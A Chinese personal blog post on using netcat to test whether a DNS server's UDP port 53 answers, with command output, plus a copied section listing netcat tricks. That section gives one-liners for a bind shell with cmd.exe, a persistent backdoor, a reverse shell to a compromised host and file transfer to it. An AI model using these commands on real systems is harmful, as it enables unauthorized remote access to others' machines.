[实中OK]windows下的nc,查看NDS的UDP端口是否能连接,nc -vuz 202.106.0.20 53 。 不指定

jackxiang 2017-11-15 14:36 | |


How does netcat know if a UDP port is open?  From:https://unix.stackexchange.com/questions/235830/how-does-netcat-know-if-a-udp-port-is-open

软件下载地址-------http://down.51cto.com/data/1982508
解压密码:zerosecurity
  放到:C:\Windows\System32下面,
download:

因为telnet走的是tcp协议,DNS可能是UDP,探测UDP端口通不通,使用如下参数:
Linux一般用来探测UDP端口:


nc -vuz 202.106.0.20 53
Connection to 202.106.0.20 53 port [udp/domain] succeeded!
nc -vuz 115.182.218.210 53
Connection to 115.182.218.210 53 port [udp/domain] succeeded!

Window:
http://blog.csdn.net/iw1210/article/details/51603772
Nc和NetCat好像有些不一样,这个:http://blog.csdn.net/xysoul/article/details/52270149
用nc -v -z -u 192.168.0.25 1-100  #这是扫描1到00间的UDP端口
D:\Program Files\curl_wget_tail>nc -v -z -u 115.182.218.210 50-54
115.182.218.210: 反向连接查询主机: h_errno 11004: 无数据
(UNKNOWN) [115.182.218.210] 54 (?) 打开
(UNKNOWN) [115.182.218.210] 53 (?) 打开
(UNKNOWN) [115.182.218.210] 52 (?) 打开
(UNKNOWN) [115.182.218.210] 51 (?) 打开
(UNKNOWN) [115.182.218.210] 50 (?) 打开
用NC自己创建一个UDP的侦听器,From:https://serverfault.com/questions/773110/make-netcat-listen-for-multiple-udp-packets
nc -l -u -p 1234

DNSServer的两个端口都开了的:
netstat -atlunp|grep 53
tcp        0      0 0.0.0.0:53                  0.0.0.0:*                   LISTEN      34933/dnsmasq              
udp        0      0 0.0.0.0:53                  0.0.0.0:*                               34933/dnsmasq  


Windows 下,DNS的UDP端口在53端口存在,和58不存的返回对比:
C:\Users\Administrator>nc -vuz 202.106.0.20 53
gjjline.bta.net.cn [202.106.0.20] 53 (domain) 打开
没有的返回:
C:\Users\Administrator>nc -vuz 202.106.0.20 58
gjjline.bta.net.cn [202.106.0.20] 58 (?) 打开
Telnet其同样的端口是TCP,也没返回,但是用dig解释是OK的,说明其打开的是53的UDP端口:
像上面这个IP只是UDP,用Telnet其TCP53就没有返回,如下:
C:\Users\Administrator>telnet 202.106.0.20 53
正在连接202.106.0.20...无法打开到主机的连接。 在端口 53: 连接失败

windows server 2012 R2下运行dig和nslookup查看cdn是否配置生效,Window Server 2012 R2 下安装 dig 命令后查看DNS是否网路53tcp/udp口生效的检测方法:
http://jackxiang.com/post/8776/
--------------------------------------------------------------------

1.端口监听,可配合sfind使用

   sfind -p port ip 来测试该端口本地是否可监听;

   nc -vv -l -p port 监听端口port的通信;

wKioL1TZZ1_xBi8zAAD_aDwhboE934.jpg

wKiom1TZZmyQmKhlAAAxsmThS-o061.jpg



2.搭建简单的远程shell

   远程主机运行 nc -l -p port -t -e cmd.exe (-t:以telnet形式连接 -e:程序定向)

   本机以telnet remote-ip_address port 即可直接登陆

wKioL1TZaYnyBMznAAAu-TWF0iY214.jpg

wKiom1TZaJawl_6fAAAxDyk9daI729.jpg

wKiom1TZagmTmzFrAAEq0DgN4WU835.jpg



3.长期后门的建立

   远程主机运行 nc -l -p port -L -d cmd.exe;其他同2;

   wKiom1TZak_ggYp9AAA88cJyfMI281.jpg



4.反向连接,远程绑定cmdshell

   local ip:192.168.1.6 remote ip:192.168.72.143

   把远程主机的cmdshell绑定到本机ip的某个端口;

wKiom1TZa5vwYbKzAABVTUrON6w570.jpg

本地监听绑定的端口,自动连接到远程主机(肉鸡);

wKioL1TZbI_hMwEIAAFmFuBO_o8681.jpg



5.建立数据管道,传输文件;

   肉鸡开始监听port,结果输出到某个文件;

wKiom1TZccLyaVWEAACHWCeJg1k061.jpg

   本地读取要传输的文件,传输到相应的端口;

wKioL1TZcrWgCR2aAADOFw8zP1M513.jpg

   成功发送,简单实惠;

wKioL1TZcraRA3wdAACAyncLJtU662.jpg



6.其他功能,比如做蜜罐,抢占系统服务端口,扫描端口等;有其他更好的软件可用,后续会写~

From:http://zerosecurity.blog.51cto.com/9913090/1613252/

作者:jackxiang@向东博客 专注WEB应用 构架之美 --- 构架之美,在于尽态极妍 | 应用之美,在于药到病除
地址:https://jackxiang.com/post/9521/
版权所有。转载时必须以链接形式注明作者和原始出处及本声明!


最后编辑: jackxiang 编辑于2018-10-25 17:28
评论列表
发表评论

昵称

网址

电邮

打开HTML 打开UBB 打开表情 隐藏 记住我 [登入] [注册]